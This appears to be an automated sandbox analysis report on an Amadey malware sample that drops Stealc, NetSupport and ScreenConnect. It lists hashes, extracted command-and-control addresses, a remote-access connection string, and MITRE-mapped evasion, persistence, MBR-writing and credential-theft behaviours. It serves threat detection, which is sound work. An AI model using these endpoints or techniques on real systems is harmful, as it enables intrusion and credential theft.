amadey | 4c165fe75aadc4ad7cb2800641f52ed55a8e50b80445c88660e0d8cbc306c778

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d3053f42c2c51006ff8ae62525ef2221.exe
Size

5.4MB
MD5

d3053f42c2c51006ff8ae62525ef2221
SHA1

9049789457f3c8239be6f9d1c143f5d1f385ba89
SHA256

4c165fe75aadc4ad7cb2800641f52ed55a8e50b80445c88660e0d8cbc306c778
SHA512

0b894087a49fb6d9007ee5d76077587c04f2a7826123019301870b281d143c63b8e6a78ef6e3cf084a9e64da01f6bae96a9221395f523454afabe66c5833c298
SSDEEP

98304:vGSKk20HutmezO2hDSuKWU0b30qYs7mAMReFa6CPg6pkoMm5iGQQV/azW:Otkramez1DSuJZbzYSmyBCrpkvKaa

Score

10^/10

amadey netsupport stealc 092155 trump bootkit credential_access defense_evasion discovery execution exploit persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Netsupport family
netsupport
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 11164 created 2664	11164	Exam.com	44

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1W48q9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2z6609.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3g52f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ba1405f49d.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1384	powershell.exe
13192	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
196	1688	3g52f.exe
223	1688	3g52f.exe
223	1688	3g52f.exe
223	1688	3g52f.exe
223	1688	3g52f.exe
299	6084	rapes.exe
299	6084	rapes.exe
299	6084	rapes.exe
299	6084	rapes.exe
299	6084	rapes.exe
35	6084	rapes.exe
105	6084	rapes.exe
284	6084	rapes.exe
199	2616	svchost.exe
219	6084	rapes.exe
206	6084	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\klupd_6bbb4d94a_klbg.sys	e8378438.exe
File created	C:\Windows\System32\Drivers\6bbb4d94.sys	e8378438.exe
File created	C:\Windows\System32\Drivers\klupd_6bbb4d94a_arkmon.sys	e8378438.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
9092	takeown.exe
13268	icacls.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_6bbb4d94a_arkmon.sys"	e8378438.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\6bbb4d94\ImagePath = "System32\\Drivers\\6bbb4d94.sys"	e8378438.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_arkmon.sys"	e8378438.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=67825598-e6d3-483b-b1f9-63d40d7c12d7&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAFh8gVlHqbEmH0zDp3ue2XwAAAAACAAAAAAAQZgAAAAEAACAAAACki8BVRIVrKg9rPDsjxXi1ZT%2fKoXJLk7jnpR0QNwcn%2fwAAAAAOgAAAAAIAACAAAAD12l3VqGYPHVFMR2acJZfJ18qiN4qZC5%2fixsYWBu48V6AEAAA7cHsDt66qR6P%2bQAjFLBe9KfJB02L%2f%2bMHFHo3Hza7jwAyPJAnqpdERH3woJUpXeMiJGNc8GdBBKlHeN8joEp%2bEjffy5WPQhJTIXsY6lleamEUB59a%2fNu360rCp3tB3vnknISM%2boUhlxpfqozh8UUyPPWSw5CQkrK5hfxeMPMvin4zT7E2%2fRkr1By%2fYcE1L%2fo%2b3KitACT7PexmkAjw3eKqwvGKAWsUF%2bg5dhK8znK919M68u0yMMUQqJejLe5pSuuWAu5oYCbNBsscZwZqKRhkS6J3fB5Y383ey2tdkCKLog4%2bvCRkrXRHIPeSL87uKvdYnnkwVfkUZI6xRM59YcLkKxaadmVsLECWNHNPYDMtEAdRzPf1Q9P%2b58eb3Ad3F4JRGjqooH5H0R6jJRsxa2nLUAojuDPKqgdmyvy2NtyooFwqh81UgG1A7DSipZxeILUDNBYk7%2bEILMpFixtJa5Q6P8WTY6l6dswFleaTFDivV8exO3DfHsIaKCw87vpxjqPnw8ucd6QcPMRJYlSlB0sDxqLvUbWtS%2f8TnhH00fofkUuC5%2fbRD1rnbdsBmWS6G%2b3bBG3JhkpoF7N9787c%2bfqtd7hZXmcSSkA%2fW0FR%2fRJ95gG5MNXxK7WxRcbu2DaHwDSQaccx3OfKBFdPxWlHknmT21PIOmGCQEsk7XLCnX9bnMB6OicYPw0NN4qkI11eA%2bi4byL3m9jvkvmr5zTLGeSU0Vvzru8XjG3f3jyxqWrFoAgpnBC%2brz05Go3janBr1dVGpDbft0imIDO5p0gf%2fNdzYWelvlDKDbw0V9GgAa6O6YH4kej%2bvJNZniKdCvnizJl%2fYE2%2b1mMUExHIA4fTBwRPBxxYnDrTfQrNJ8O9bNlDb0Ttpedam2j7FyImEGMQ9H%2fVX4GW8KoO2jPh%2bfgYSZU74Y0Mwttyo%2fMT1WHOrf2m90YhVtDwAUJAtA3zDKjvIoIjO0Dq7%2f%2by6HUHwof2SV%2b71jR3KmUR7NR3MByw3O9Sksdf6TzxImhXl%2fhOH8eFazppQl3FrDtMhufVZX6ySjdyqMquIWAi3%2fYKiBCQSFaiby8ILj92svgXOICh%2b72UXsAmcdO%2fc6oF0N%2f9sHHi6yEc8oLRcH3wYUIwdOh2q0mQGBW6XgF0asJPGHimMldREY9ASeZk9iy62SFs0hnoiwrQmrNTP8n%2f%2fZoBu9dZCIoCJvyWNpq6Ln1hvIXL7QWgc%2f7SuThh0d3arm%2bIDgAAvHoYeaB3WbIKo96%2fyPCqdzLCxM8ZizFIzUWxphRKZchFOXfnOWztuec%2feAUbxWFnz7Jqto7Hes4JrDV6I9UyKxkDFvVhBsw%2fEmzgdtv6vVEqeZSVba2mJ5gWZm8JSFjPdM1V9vTseCDRumxwWumbbvS%2brPizrs48yCRC%2fVDlTJUFo5SPZ15YX8EvpxsADoXKRLMZR%2feT5MIWqErL7%2bl5eOA%2fRJwJ4EZPcpUXZcen%2bqMIyL9U4eIUxudsiqFEn2uaoZiz%2fjAyOY%2by5s6W182MtPverXsNkzNa2qjUSwlPrHQvF5R%2f6l5N81h8elka9aoSliEmCKzRUlBqc3ebzp2nwX5x8HkAAAAD2IPEi1aoYeXN0TnTwMjMsKr1vyGIzzs1pCVb1LSJZrUOAArgaFzhDghMno0jfRl2h1wfDToBgC22D8XaphkA3&t=purchased\""	ScreenConnect.ClientService.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klbg\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klbg.sys"	e8378438.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klark.sys"	e8378438.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_mark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_mark.sys"	e8378438.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 18 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
544	chrome.exe
4060	chrome.exe
5476	chrome.exe
9652	chrome.exe
10548	chrome.exe
10568	chrome.exe
9252	msedge.exe
4036	msedge.exe
6060	msedge.exe
10892	chrome.exe
11008	chrome.exe
9340	msedge.exe
5600	chrome.exe
4828	msedge.exe
4860	msedge.exe
3060	msedge.exe
3828	chrome.exe
5072	msedge.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ba1405f49d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1W48q9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2z6609.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ba1405f49d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1W48q9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2z6609.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3g52f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3g52f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	1W48q9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	dBSGwVB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	tool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	WLbfHbp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	11.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 32 IoCs

pid	Process
972	A0v32.exe
4920	1W48q9.exe
6084	rapes.exe
3100	2z6609.exe
1688	3g52f.exe
2320	b7886494d4.exe
2520	f73ae_003.exe
3272	7IIl2eE.exe
4728	tzutil.exe
2460	w32tm.exe
13224	rapes.exe
2312	ba1405f49d.exe
8008	tool.exe
9196	WLbfHbp.exe
9796	7e9c4712.exe
11076	e8378438.exe
13096	ScreenConnect.ClientService.exe
2032	ScreenConnect.WindowsClient.exe
6912	ScreenConnect.WindowsClient.exe
11164	Exam.com
11916	rapes.exe
12340	BIm18E9.exe
12568	apple.exe
12692	11.exe
12880	11.exe
5540	dBSGwVB.exe
4616	bild.exe
8492	a7def4e3c2.exe
9456	kDveTWY.exe
5880	BIm18E9.exe
7296	7IIl2eE.exe
2144	TbV75ZR.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	ba1405f49d.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	1W48q9.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	2z6609.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	3g52f.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys\ = "Driver"	e8378438.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys	e8378438.exe

Loads dropped DLL 55 IoCs

pid	Process
1688	3g52f.exe
1688	3g52f.exe
8228	MsiExec.exe
8320	rundll32.exe
8320	rundll32.exe
8320	rundll32.exe
8320	rundll32.exe
8320	rundll32.exe
8320	rundll32.exe
8320	rundll32.exe
8320	rundll32.exe
8320	rundll32.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
12736	MsiExec.exe
13012	MsiExec.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
4616	bild.exe
4616	bild.exe
4616	bild.exe
4616	bild.exe
4616	bild.exe
4616	bild.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
13268	icacls.exe
9092	takeown.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bde5f912-2587-4f68-9fe7-e3a66c2429ac = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{2f895c89-8ea7-4935-8090-53ee6cb3d64f}\\bde5f912-2587-4f68-9fe7-e3a66c2429ac.cmd\""	e8378438.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	d3053f42c2c51006ff8ae62525ef2221.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	A0v32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\KasperskyLab	e8378438.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 47 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\F:	e8378438.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	e8378438.exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

persistence privilege_escalation

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\workutrv.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\workutrv.newcfg	ScreenConnect.ClientService.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
10260	tasklist.exe
10132	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
4920	1W48q9.exe
6084	rapes.exe
3100	2z6609.exe
1688	3g52f.exe
13224	rapes.exe
2312	ba1405f49d.exe
11916	rapes.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2320 set thread context of 4204	2320	b7886494d4.exe	121
PID 8492 set thread context of 8564	8492	a7def4e3c2.exe	278
PID 9456 set thread context of 9556	9456	kDveTWY.exe	281

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	e8378438.exe
File opened (read-only)	\??\VBoxMiniRdrDN	7e9c4712.exe

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe

Drops file in Windows directory 50 IoCs

description	ioc	Process
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\MandateFlashing	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\e58b512.msi	msiexec.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\MSIB63C.tmp	msiexec.exe
